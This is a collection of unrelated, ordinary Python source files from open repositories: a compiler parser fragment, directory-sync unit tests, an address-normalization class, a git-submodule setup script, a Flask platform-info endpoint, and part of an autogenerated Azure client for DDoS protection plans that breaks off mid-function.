expr = self.create_expr(dast.DictCompExpr, node)
else:
expr = self.create_expr(dast.GeneratorExpr, node)
for g in node.generators:
expr.unlock()
self.current_context = Assignment()
# DistAlgo: overload 'in' to allow pattern matching:
expr.domains.append(self.parse_domain_spec(g))
expr.lock()
self.current_context = Read()
expr.conditions.extend([self.visit(i) for i in g.ifs])
if isinstance(node, DictComp):
kv = dast.KeyValue(expr)
kv.key = self.visit(node.key)
kv.value = self.visit(node.value)
expr.elem = kv
else:
expr.elem = self.visit(node.elt)
self.pop_state()
return expr
visit_ListComp = generator_visit
visit_GeneratorExp = generator_visit
visit_SetComp = generator_visit
visit_DictComp = generator_visit
del generator_visit
def visit_IfExp(self, node):
expr = self.create_expr(dast.IfExpr, node)
expr.condition = self.visit(node.test)
expr.body = self.visit(node.body)
expr.orbody = self.visit(node.orelse)
self.pop_state()
return expr
def visit_Starred(self, node):
expr = self.create_expr(dast.StarredExpr, node)
expr.value = self.visit(node.value)
self.pop_state()
return expr
# Helper Nodes
def error(self, mesg, node):
self.errcnt += 1
if node is not None:
printe(mesg, node.lineno, node.col_offset, self.filename)
else:
printe(mesg, 0, 0, self.filename)
def warn(self, mesg, node):
self.warncnt += 1
if node is not None:
printw(mesg, node.lineno, node.col_offset, self.filename)
else:
printw(mesg, 0, 0, self.filename)
def debug(self, mesg, node=None):
if node is not None:
printd(mesg, node.lineno, node.col_offset, self.filename)
else:
printd(mesg, 0, 0, self.filename)
if __name__ == "__main__":
pass
|
mayli/DistAlgo
|
da/compiler/parser.py
|
Python
|
mit
| 75,023
|
__author__ = 'diegoj'
|
intelligenia/modeltranslation
|
modeltranslation/admin/__init__.py
|
Python
|
mit
| 22
|
#!/usr/bin/env python
# vim: set fdm=marker:
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import os.path
import unittest
import tempdir
from .. import smart_dir_copy
__version__ = '0.1'
class Test_SmartDirCopy01(unittest.TestCase):
def test01(self):
with tempdir.TempDir() as td:
os.mkdir(os.path.join(td, 'source'))
with open(os.path.join(td, 'source', 'foo.txt'), 'wb'):
pass
os.mkdir(os.path.join(td, 'dest'))
smart_dir_copy.smart_dir_sync(
os.path.join(td, 'source'),
os.path.join(td, 'dest')
)
self.assertSequenceEqual(
('foo.txt',),
os.listdir(os.path.join(td, 'dest'))
)
self.assertEqual(
int(os.path.getmtime(os.path.join(td, 'source', 'foo.txt'))),
int(os.path.getmtime(os.path.join(td, 'dest', 'foo.txt')))
)
def test02(self):
with tempdir.TempDir() as td:
os.mkdir(os.path.join(td, 'source'))
with open(os.path.join(td, 'source', 'foo.txt'), 'wb'):
pass
with open(os.path.join(td, 'source', 'bar.txt'), 'wb'):
pass
os.mkdir(os.path.join(td, 'dest'))
smart_dir_copy.smart_dir_sync(
os.path.join(td, 'source'),
os.path.join(td, 'dest')
)
self.assertItemsEqual(
('foo.txt', 'bar.txt'),
os.listdir(os.path.join(td, 'dest'))
)
self.assertEqual(
int(os.path.getmtime(os.path.join(td, 'source', 'foo.txt'))),
int(os.path.getmtime(os.path.join(td, 'dest', 'foo.txt')))
)
self.assertEqual(
int(os.path.getmtime(os.path.join(td, 'source', 'bar.txt'))),
int(os.path.getmtime(os.path.join(td, 'dest', 'bar.txt')))
)
def test_no_update_necessary(self):
with tempdir.TempDir() as td:
# {{{
###################################################################
# Set up the source directory.
os.mkdir(os.path.join(td, 'source'))
with open(os.path.join(td, 'source', 'foo.txt'), 'wb') as w:
w.write('abc')
os.utime(
os.path.join(td, 'source', 'foo.txt'),
(1473656261, 1473656261)
)
with open(os.path.join(td, 'source', 'bar.txt'), 'wb') as w:
w.write('def')
os.utime(
os.path.join(td, 'source', 'bar.txt'),
(1473656261 + 1, 1473656261 + 1)
)
os.mkdir(os.path.join(td, 'source', 'alpha'))
with open(
os.path.join(td, 'source', 'alpha', 'foo1.txt'), 'wb'
) as w:
w.write('ghi')
os.utime(
os.path.join(td, 'source', 'alpha', 'foo1.txt'),
(1473656261 + 2, 1473656261 + 2)
)
with open(
os.path.join(td, 'source', 'alpha', 'bar2.txt'), 'wb'
) as w:
w.write('jkl')
os.utime(
os.path.join(td, 'source', 'alpha', 'bar2.txt'),
(1473656261 + 3, 1473656261 + 3)
)
#
###################################################################
# }}}
# {{{
###################################################################
# Set up the dest directory.
os.mkdir(os.path.join(td, 'dest'))
with open(os.path.join(td, 'dest', 'foo.txt'), 'wb') as w:
w.write('123')
os.utime(
os.path.join(td, 'dest', 'foo.txt'),
(1473656261, 1473656261)
)
with open(os.path.join(td, 'dest', 'bar.txt'), 'wb') as w:
w.write('456')
os.utime(
os.path.join(td, 'dest', 'bar.txt'),
(1473656261 + 1, 1473656261 + 1)
)
os.mkdir(os.path.join(td, 'dest', 'alpha'))
with open(
os.path.join(td, 'dest', 'alpha', 'foo1.txt'), 'wb'
) as w:
w.write('789')
os.utime(
os.path.join(td, 'dest', 'alpha', 'foo1.txt'),
(1473656261 + 2, 1473656261 + 2)
)
with open(
os.path.join(td, 'dest', 'alpha', 'bar2.txt'), 'wb'
) as w:
w.write('012')
os.utime(
os.path.join(td, 'dest', 'alpha', 'bar2.txt'),
(1473656261 + 3, 1473656261 + 3)
)
#
###################################################################
# }}}
smart_dir_copy.smart_dir_sync(
os.path.join(td, 'source'),
os.path.join(td, 'dest')
)
for tpl in (
('foo.txt', 'abc'),
('bar.txt', 'def')
):
with open(os.path.join(td, 'source', tpl[0]), 'rb') as r:
self.assertEqual(
tpl[1],
r.read()
)
for tpl in (
('foo1.txt', 'ghi'),
('bar2.txt', 'jkl')
):
with open(
os.path.join(td, 'source', 'alpha', tpl[0]), 'rb'
) as r:
self.assertEqual(
tpl[1],
r.read()
)
for tpl in (
('foo.txt', '123'),
('bar.txt', '456')
):
with open(os.path.join(td, 'dest', tpl[0]), 'rb') as r:
self.assertEqual(
tpl[1],
r.read()
)
for tpl in (
('foo1.txt', '789'),
('bar2.txt', '012')
):
with open(
os.path.join(td, 'dest', 'alpha', tpl[0]), 'rb'
) as r:
self.assertEqual(
tpl[1],
r.read()
)
def test_03(self):
with tempdir.TempDir() as td:
# {{{
###################################################################
# Set up the source directory.
os.mkdir(os.path.join(td, 'source'))
with open(os.path.join(td, 'source', 'foo.txt'), 'wb'):
pass
with open(os.path.join(td, 'source', 'bar.txt'), 'wb'):
pass
os.mkdir(os.path.join(td, 'source', 'alpha'))
with open(os.path.join(td, 'source', 'alpha', 'foo1.txt'), 'wb'):
pass
with open(os.path.join(td, 'source', 'alpha', 'bar2.txt'), 'wb'):
pass
#
###################################################################
# }}}
os.mkdir(os.path.join(td, 'dest'))
smart_dir_copy.smart_dir_sync(
os.path.join(td, 'source'),
os.path.join(td, 'dest')
)
self.assertItemsEqual(
('foo.txt', 'bar.txt', 'alpha'),
os.listdir(os.path.join(td, 'dest'))
)
self.assertEqual(
int(os.path.getmtime(os.path.join(td, 'source', 'foo.txt'))),
int(os.path.getmtime(os.path.join(td, 'dest', 'foo.txt')))
)
self.assertEqual(
int(os.path.getmtime(os.path.join(td, 'source', 'bar.txt'))),
int(os.path.getmtime(os.path.join(td, 'dest', 'bar.txt')))
)
self.assertItemsEqual(
('foo1.txt', 'bar2.txt'),
os.listdir(os.path.join(td, 'dest', 'alpha'))
)
self.assertEqual(
int(os.path.getmtime(os.path.join(td, 'source', 'alpha', 'foo1.txt'))),
int(os.path.getmtime(os.path.join(td, 'dest', 'alpha', 'foo1.txt')))
)
self.assertEqual(
int(os.path.getmtime(os.path.join(td, 'source', 'alpha', 'bar2.txt'))),
int(os.path.getmtime(os.path.join(td, 'dest', 'alpha', 'bar2.txt')))
)
def test_differentFileContentsSameMtime(self):
with tempdir.TempDir() as td:
# {{{
###################################################################
# Set up the source directory.
os.mkdir(os.path.join(td, 'source'))
with open(os.path.join(td, 'source', 'foo.txt'), 'wb') as w:
w.write('abc')
os.utime(
os.path.join(td, 'source', 'foo.txt'),
(1473656261, 1473656261)
)
with open(os.path.join(td, 'source', 'bar.txt'), 'wb') as w:
w.write('def')
os.utime(
os.path.join(td, 'source', 'bar.txt'),
(1473656261 + 1, 1473656261 + 1)
)
os.mkdir(os.path.join(td, 'source', 'alpha'))
with open(
os.path.join(td, 'source', 'alpha', 'foo1.txt'), 'wb'
) as w:
w.write('ghi')
os.utime(
os.path.join(td, 'source', 'alpha', 'foo1.txt'),
(1473656261 + 2, 1473656261 + 2)
)
with open(
os.path.join(td, 'source', 'alpha', 'bar2.txt'), 'wb'
) as w:
w.write('jkl')
os.utime(
os.path.join(td, 'source', 'alpha', 'bar2.txt'),
(1473656261 + 3, 1473656261 + 3)
)
#
###################################################################
# }}}
# {{{
###################################################################
# Set up the dest directory.
os.mkdir(os.path.join(td, 'dest'))
#
# We set up a dest file that has the same mtime as the src file,
# but a different file size.
with open(os.path.join(td, 'dest', 'foo.txt'), 'wb') as w:
w.write('12')
os.utime(
os.path.join(td, 'dest', 'foo.txt'),
(1473656261, 1473656261)
)
#
with open(os.path.join(td, 'dest', 'bar.txt'), 'wb') as w:
w.write('456')
os.utime(
os.path.join(td, 'dest', 'bar.txt'),
(1473656261 + 1, 1473656261 + 1)
)
#
os.mkdir(os.path.join(td, 'dest', 'alpha'))
with open(
os.path.join(td, 'dest', 'alpha', 'foo1.txt'), 'wb'
) as w:
w.write('789')
os.utime(
os.path.join(td, 'dest', 'alpha', 'foo1.txt'),
(1473656261 + 2, 1473656261 + 2)
)
with open(
os.path.join(td, 'dest', 'alpha', 'bar2.txt'), 'wb'
) as w:
w.write('012')
os.utime(
os.path.join(td, 'dest', 'alpha', 'bar2.txt'),
(1473656261 + 3, 1473656261 + 3)
)
#
###################################################################
# }}}
smart_dir_copy.smart_dir_sync(
os.path.join(td, 'source'),
os.path.join(td, 'dest')
)
for tpl in (
('foo.txt', 'abc'),
('bar.txt', 'def')
):
with open(os.path.join(td, 'source', tpl[0]), 'rb') as r:
self.assertEqual(
tpl[1],
r.read()
)
for tpl in (
('foo1.txt', 'ghi'),
('bar2.txt', 'jkl')
):
with open(
os.path.join(td, 'source', 'alpha', tpl[0]), 'rb'
) as r:
self.assertEqual(
tpl[1],
r.read()
)
for tpl in (
('foo.txt', 'abc'),
('bar.txt', '456')
):
with open(os.path.join(td, 'dest', tpl[0]), 'rb') as r:
self.assertEqual(
tpl[1],
r.read()
)
for tpl in (
('foo1.txt', '789'),
('bar2.txt', '012')
):
with open(
os.path.join(td, 'dest', 'alpha', tpl[0]), 'rb'
) as r:
self.assertEqual(
tpl[1],
r.read()
)
class Test_SetMtime(unittest.TestCase):
def test01(self):
new_mtime = 1473652205
with tempdir.TempDir() as td:
with open(os.path.join(td, 'foo.txt'), 'wb'):
pass
smart_dir_copy.set_mtime(os.path.join(td, 'foo.txt'), new_mtime)
self.assertEqual(
new_mtime,
int(os.path.getmtime(os.path.join(td, 'foo.txt')))
)
if __name__ == '__main__':
unittest.main()
|
shalesbridge/steamssdmanager
|
tests/test_smart_dir_copy.py
|
Python
|
mit
| 13,521
|
# coding: UTF-8
'''
Created on Apr 16, 2014
@author: hernan
'''
import re
from usig_normalizador_amba.settings import CALLE_ALTURA, CALLE_Y_CALLE, INVALIDO
from usig_normalizador_amba.Calle import Calle
class Direccion:
'''
@ivar calle: Calle de la direccion
@type calle: Calle
@ivar altura: Altura de la calle
@type altura: Integer
@ivar cruce: Calle con la que se cruza
@type cruce: Calle
@ivar tipo: tipo de la calle
@type tipo: {CALLE_ALTURA = 0, CALLE_Y_CALLE = 1}
@ivar smp: Seccion-Manzana-Parcela
@type smp: String
@ivar coordenadas: Geocodificacion
@type coordenadas: Punto
@ivar partido: Partido de la direccion
@type partido: Partido
'''
calle = None
altura = 0
cruce = None
tipo = INVALIDO
coordenadas = None
partido = None
localidad = ''
def __init__(self, calle, altura=0, cruce=None):
'''
@ivar calle: Calle de la direccion
@type calle: Calle
@ivar altura: Altura de la calle
@type altura: Integer
@ivar cruce: Calle con la que se cruza
@type cruce: Calle
'''
try:
if(isinstance(calle, Calle)):
self.calle = calle
self.partido = calle.partido
self.localidad = calle.localidad
else:
raise TypeError('calle must be a Calle object.')
self.altura = int(altura)
if (cruce is None or isinstance(cruce, Calle)):
self.cruce = cruce
else:
raise TypeError('cruce must be a Calle object.')
if self.altura > 0:
self.tipo = CALLE_ALTURA
elif cruce is not None:
self.tipo = CALLE_Y_CALLE
else:
self.tipo = INVALIDO
except Exception as e:
raise e
def __str__(self):
return self.__unicode__().encode('utf8', 'ignore')
def __unicode__(self):
retval = '''-- Dirección
calle = {0}
altura = {1}
cruce = {2}
coordenadas = {3}
partido = {4}
localidad = {5}'''
return retval.format(self.calle.nombre,
self.altura,
self.cruce.nombre if self.cruce is not None else '',
self.coordenadas,
self.partido.nombre,
self.localidad)
def toString(self):
'''
Devuelve un string con la direccion escrita correctamente para mostrar
@return: Direccion como texto
@rtype: String
'''
if (self.tipo == CALLE_ALTURA):
if(self.altura > 0):
altura = self.altura
else:
altura = 'S/N'
retval = '{0} {1}, {2}'.format(self.calle.nombre, altura, self.partido.nombre)
elif (self.tipo == CALLE_Y_CALLE):
if(re.match('(?i)(I|Hi|HI)', self.cruce.nombre) is not None):
separador = 'e'
else:
separador = 'y'
retval = '{0} {1} {2}, {3}'.format(self.calle.nombre, separador, self.cruce.nombre, self.partido.nombre)
else:
retval = ''
return retval
|
usig/normalizador-amba
|
usig_normalizador_amba/Direccion.py
|
Python
|
mit
| 3,273
|
#!/usr/bin/python3
import os
os.system("git submodule init")
os.system("git submodule update")
print("Setup Completed")
|
SadGaming/SadSDLGame
|
scripts/setup.py
|
Python
|
mit
| 120
|
import ld
import os
import sys
from flask_restful import Resource
IS_WIN = os.name == 'nt'
IS_LINUX = sys.platform.startswith('linux')
IS_DARWIN = sys.platform.startswith('darwin')
class Platform(Resource):
def get(self):
if IS_LINUX:
return dict(
id=ld.id(),
name=ld.name(),
version=ld.version(),
like=ld.like(),
codename=ld.codename(),
base=ld.base()
)
|
natict/roomservice
|
roomservice/system/platform.py
|
Python
|
mit
| 491
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class DdosProtectionPlansOperations:
"""DdosProtectionPlansOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_02_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
ddos_protection_plan_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ddosProtectionPlanName': self._serialize.url("ddos_protection_plan_name", ddos_protection_plan_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ddosProtectionPlans/{ddosProtectionPlanName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
ddos_protection_plan_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes the specified DDoS protection plan.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ddos_protection_plan_name: The name of the DDoS protection plan.
:type ddos_protection_plan_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
ddos_protection_plan_name=ddos_protection_plan_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ddosProtectionPlanName': self._serialize.url("ddos_protection_plan_name", ddos_protection_plan_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ddosProtectionPlans/{ddosProtectionPlanName}'} # type: ignore
async def get(
self,
resource_group_name: str,
ddos_protection_plan_name: str,
**kwargs: Any
) -> "_models.DdosProtectionPlan":
"""Gets information about the specified DDoS protection plan.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ddos_protection_plan_name: The name of the DDoS protection plan.
:type ddos_protection_plan_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DdosProtectionPlan, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_02_01.models.DdosProtectionPlan
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DdosProtectionPlan"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ddosProtectionPlanName': self._serialize.url("ddos_protection_plan_name", ddos_protection_plan_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('DdosProtectionPlan', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ddosProtectionPlans/{ddosProtectionPlanName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
ddos_protection_plan_name: str,
parameters: "_models.DdosProtectionPlan",
**kwargs: Any
) -> "_models.DdosProtectionPlan":
cls = kwargs.pop('cls', None) # type: ClsType["_models.DdosProtectionPlan"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ddosProtectionPlanName': self._serialize.url("ddos_protection_plan_name", ddos_protection_plan_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'DdosProtectionPlan')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('DdosProtectionPlan', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('DdosProtectionPlan', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ddosProtectionPlans/{ddosProtectionPlanName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
ddos_protection_plan_name: str,
parameters: "_models.DdosProtectionPlan",
**kwargs: Any
) -> AsyncLROPoller["_models.DdosProtectionPlan"]:
"""Creates or updates a DDoS protection plan.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ddos_protection_plan_name: The name of the DDoS protection plan.
:type ddos_protection_plan_name: str
:param parameters: Parameters supplied to the create or update operation.
:type parameters: ~azure.mgmt.network.v2018_02_01.models.DdosProtectionPlan
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either DdosProtectionPlan or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2018_02_01.models.DdosProtectionPlan]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.DdosProtectionPlan"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
ddos_protection_plan_name=ddos_protection_plan_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('DdosProtectionPlan', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ddosProtectionPlanName': self._serialize.url("ddos_protection_plan_name", ddos_protection_plan_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ddosProtectionPlans/{ddosProtectionPlanName}'} # type: ignore
def list(
self,
**kwargs: Any
) -> AsyncIterable["_models.DdosProtectionPlanListResult"]:
"""Gets all DDoS protection plans in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DdosProtectionPlanListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2018_02_01.models.DdosProtectionPlanListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DdosProtectionPlanListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('DdosProtectionPlanListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/ddosProtectionPlans'} # type: ignore
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.DdosProtectionPlanListResult"]:
"""Gets all the DDoS protection plans in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DdosProtectionPlanListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2018_02_01.models.DdosProtectionPlanListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DdosProtectionPlanListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('DdosProtectionPlanListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
